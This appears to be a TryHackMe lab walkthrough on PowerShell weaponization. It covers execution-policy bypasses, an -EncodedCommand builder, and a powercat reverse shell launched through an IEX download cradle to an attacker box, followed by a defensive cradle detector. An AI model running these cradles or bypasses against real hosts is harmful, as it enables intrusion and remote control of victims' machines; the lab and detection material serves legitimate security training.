PowerShell (PSH)

PowerShell is an object-oriented scripting language that runs on .NET and uses the Dynamic Language Runtime (DLR) for dynamic binding, with some exceptions kept for legacy uses. Check out the TryHackMe room Hacking with PowerShell for more information about PowerShell.

Red teamers rely on PowerShell for many activities, including initial access and system enumeration. Let's start by creating a straightforward PowerShell script that prints "Welcome to the Weaponization Room!":

Write-Output "Welcome to the Weaponization Room!"

Save the file as thm.ps1. Write-Output sends the string "Welcome to the Weaponization Room!" to the success output stream, which is what the console displays. Now let's run it and see the result.

C:\Users\thm\Desktop>powershell -File thm.ps1
File C:\Users\thm\Desktop\thm.ps1 cannot be loaded because running scripts is disabled on this system. For more
information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
    + CategoryInfo          : SecurityError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : UnauthorizedAccess
 
C:\Users\thm\Desktop>

Execution Policy

PowerShell's execution policy is a safety feature that controls whether script files (.ps1) are loaded. It is not a security boundary: it does not restrict individual commands typed at the prompt, and a user can change or sidestep it, as shown later. On Windows client systems the default policy is Restricted, which permits individual commands but does not run any script file (Windows Server defaults to RemoteSigned).

You can check the current effective execution policy as follows (add -List to see the value held in each scope; the effective policy is the first scope in precedence order that is not Undefined):

PS C:\Users\thm> Get-ExecutionPolicy
Restricted

We can also change the execution policy. RemoteSigned lets locally written scripts run but requires an Authenticode signature on scripts that carry the Mark-of-the-Web, i.e. files downloaded by a browser. Setting it for -Scope CurrentUser needs no administrator rights, because the value is stored under HKCU rather than HKLM:

PS C:\Users\thm\Desktop> Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
 
Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
http://go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): A
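As an added example that is not part of the room, the following PowerShell shows how the policy resolves across scopes and predicts whether a given .ps1 would load under the current policy, including the Mark-of-the-Web check that RemoteSigned performs. The Test-ScriptWouldLoad function, the temporary demo file and the Zone.Identifier contents are constructed for this example.

```powershell
# Added example, not part of the TryHackMe room: show how the policy resolves
# across scopes and predict whether a given .ps1 would be allowed to load.

function Test-ScriptWouldLoad {
    param([Parameter(Mandatory)][string]$Path)

    $policy = Get-ExecutionPolicy   # effective policy after scope precedence

    # A file downloaded by a browser carries a Zone.Identifier alternate data
    # stream (the Mark-of-the-Web); RemoteSigned treats such a file as remote.
    $motw     = Get-Item -Path $Path -Stream Zone.Identifier -ErrorAction SilentlyContinue
    $isRemote = $null -ne $motw
    $sig      = Get-AuthenticodeSignature -FilePath $Path
    $isSigned = $sig.Status -eq 'Valid'

    $wouldLoad = switch ($policy) {
        'Restricted'   { $false }
        'AllSigned'    { $isSigned }
        'RemoteSigned' { (-not $isRemote) -or $isSigned }
        'Unrestricted' { $true }    # remote unsigned scripts prompt, but are not blocked
        'Bypass'       { $true }
        default        { $false }   # Undefined resolves to Restricted on Windows clients
    }

    [pscustomobject]@{
        Path            = $Path
        Policy          = $policy
        MarkOfTheWeb    = $isRemote
        SignatureStatus = $sig.Status
        WouldLoad       = $wouldLoad
    }
}

# Scope precedence: MachinePolicy, UserPolicy, Process, CurrentUser, LocalMachine.
# The effective policy is the first scope that is not Undefined.
Get-ExecutionPolicy -List | Format-Table -AutoSize

# Demo on a throwaway script (constructed here) so thm.ps1 is left untouched.
$demo = Join-Path $env:TEMP 'motw-demo.ps1'
Set-Content -Path $demo -Value 'Write-Output "hello from a local script"'
Test-ScriptWouldLoad -Path $demo    # local and unsigned: loads under RemoteSigned

# Simulate a browser download by attaching a Zone.Identifier stream (ZoneId 3 = Internet).
Set-Content -Path $demo -Stream Zone.Identifier -Value "[ZoneTransfer]`r`nZoneId=3"
Test-ScriptWouldLoad -Path $demo    # now remote: blocked under RemoteSigned unless signed

Unblock-File -Path $demo            # removes the stream, i.e. the Mark-of-the-Web
Test-ScriptWouldLoad -Path $demo
```

Run it once with the policy left at Restricted and again after the Set-ExecutionPolicy call above to see WouldLoad change; the Zone.Identifier round trip shows why a script you copied from a browser can be refused under RemoteSigned while the identical file you typed yourself is accepted.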

Bypass Execution Policy

Microsoft provides several ways to relax this restriction. One is to pass an execution policy as an argument on the PowerShell command line, which applies to that process only. Setting it to Bypass means nothing is blocked and no warnings or prompts are shown, which is convenient when we want to run our own scripts.

To make sure our PowerShell file is executed, we pass the Bypass option (-ex is an accepted abbreviation of -ExecutionPolicy) as follows:

C:\Users\thm\Desktop>powershell -ex bypass -File thm.ps1
Welcome to the Weaponization Room!
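Other ways the policy can be sidestepped without administrator rights, as an added example that is not from the room. All three use documented PowerShell behaviour: the policy is consulted only when a script file is loaded, so feeding the file's text to the engine as a command, or setting the policy for the current process alone, avoids it. ConvertTo-EncodedCommand is a helper written for this example; thm.ps1 is the script created above.

```powershell
# Added example, not part of the room: three ways to run thm.ps1 while the
# effective policy is still Restricted. None needs administrator rights.

# 1. Set the policy for this process only. Nothing is written to the registry
#    and -Force suppresses the prompt; "-ex bypass" on the command line sets
#    the same Process-scope value.
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force
.\thm.ps1
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Undefined -Force  # revert

# 2. Read the file and hand its text to the engine as a command instead of a
#    script file. The policy is checked only on file load, so it never fires.
#    Invoke-Expression (IEX) does the same thing to a downloaded string.
& ([scriptblock]::Create((Get-Content -Path .\thm.ps1 -Raw)))

# 3. Deliver the command via -EncodedCommand. powershell.exe expects Base64 of
#    the UTF-16LE command text; this helper (written for the example) builds it.
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Command)
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($Command)   # Unicode = UTF-16LE in .NET
    [System.Convert]::ToBase64String($bytes)
}

$enc = ConvertTo-EncodedCommand -Command (Get-Content -Path .\thm.ps1 -Raw)
"powershell.exe -NoProfile -NonInteractive -EncodedCommand $enc"   # paste-able one-liner
powershell.exe -NoProfile -NonInteractive -EncodedCommand $enc      # run it now
```

Option 2 is the building block behind the in-memory download cradle used later in this task: once the script is a string in the current session, the execution policy has nothing to say about it.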

Now, let's try to get a reverse shell using powercat, a netcat-like tool written in PowerShell. On your AttackBox, download it from GitHub and run a web server to deliver the payload.

user@machine$ git clone https://github.com/besimorhino/powercat.git
Cloning into 'powercat'...
remote: Enumerating objects: 239, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 239 (delta 0), reused 2 (delta 0), pack-reused 235
Receiving objects: 100% (239/239), 61.75 KiB | 424.00 KiB/s, done.
Resolving deltas: 100% (72/72), done.

Now we need to set up a web server on the AttackBox to serve powercat.ps1, which will be downloaded and executed on the target machine. Change into the powercat directory and start a simple HTTP server on a port of your choice; here we use port 8080.

user@machine$ cd powercat
user@machine$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

In a second terminal on the AttackBox, listen on port 1337 with nc to receive the connection back from the victim (add -n to skip the reverse DNS lookup, which fails in the lab as the output below shows):

user@machine$ nc -lvp 1337

Now, from the victim machine, we download powercat and run it in memory with a single PowerShell command:

C:\Users\thm\Desktop> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKBOX_IP:8080/powercat.ps1');powercat -c ATTACKBOX_IP -p 1337 -e cmd"

When this command runs, the victim machine downloads powercat.ps1 from our web server on the AttackBox and passes the text straight to Invoke-Expression (IEX), so the script is loaded in memory without being written to disk. The powercat function then connects to the AttackBox on port 1337 and, because of -e cmd, spawns cmd.exe and relays its input and output over that connection. No -ex bypass is needed here: the execution policy only governs script files, and this is a command string. After a couple of seconds, we should receive the callback:

user@machine$ nc -lvp 1337
listening on [any] 1337 ...
10.10.12.53: inverse host lookup failed: Unknown host
connect to [10.8.232.37] from (UNKNOWN) [10.10.12.53] 49804
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
 
C:\Users\thm>
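From the defender's side, the cradle above is loud: with Script Block Logging enabled the decoded text lands in Event ID 4104, and an -EncodedCommand payload shows up verbatim in process-creation command lines. The following added example, which is not part of the room, runs a simple detector over a few constructed log lines, decoding any -EncodedCommand argument before matching. The Find-DownloadCradle and Expand-EncodedCommand names and the sample lines are constructed for this example; the IP address reused in them is the AttackBox address from the output above.

```powershell
# Added example, not part of the room: flag PowerShell download cradles in
# constructed log lines, decoding -EncodedCommand payloads before matching.

function Expand-EncodedCommand {
    param([Parameter(Mandatory)][string]$Line)
    # powershell.exe accepts any unique prefix of -EncodedCommand (-e, -ec, -enc, ...)
    # and expects Base64 of UTF-16LE text, so decode with the Unicode encoding.
    $m = [regex]::Match($Line, '-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})', 'IgnoreCase')
    if (-not $m.Success) { return $null }
    try {
        $bytes = [System.Convert]::FromBase64String($m.Groups[1].Value)
        return [System.Text.Encoding]::Unicode.GetString($bytes)
    } catch { return $null }
}

function Find-DownloadCradle {
    param([Parameter(Mandatory)][string[]]$Lines)

    # Indicators of an in-memory download-and-execute chain like the one above.
    # Two or more distinct indicators on one line are required to reduce noise.
    $patterns = @(
        'Net\.WebClient',
        'DownloadString|DownloadData|DownloadFile',
        'Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b',
        'Invoke-Expression|\biex\b',
        'powercat'
    )

    foreach ($line in $Lines) {
        $decoded = Expand-EncodedCommand -Line $line
        $text    = if ($decoded) { "$line $decoded" } else { $line }
        $hits    = @($patterns | Where-Object { $text -match $_ })
        if ($hits.Count -ge 2) {
            [pscustomobject]@{
                Line    = $line
                Decoded = $decoded
                Hits    = ($hits -join ', ')
            }
        }
    }
}

# Constructed sample: the one-liner from above, an encoded variant of the same
# cradle, and two benign command lines that must not be flagged.
$encodedSample = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(
    "IEX(New-Object Net.WebClient).DownloadString('http://10.8.232.37:8080/powercat.ps1')"))

$sampleLines = @(
    'powershell -c "IEX(New-Object System.Net.WebClient).DownloadString(''http://10.8.232.37:8080/powercat.ps1'');powercat -c 10.8.232.37 -p 1337 -e cmd"',
    "powershell.exe -NoProfile -enc $encodedSample",
    'powershell.exe -NoProfile -File C:\Scripts\inventory.ps1',
    'Get-ChildItem -Path C:\Users -Recurse'
)

Find-DownloadCradle -Lines $sampleLines | Format-List
```

Only the first two sample lines are reported. This is deliberately naive: string substitution, tick-and-concatenation obfuscation or a different download primitive will slip past it, which is why 4104 script-block text and AMSI events, which see the code after de-obfuscation, are better sources than the raw command line.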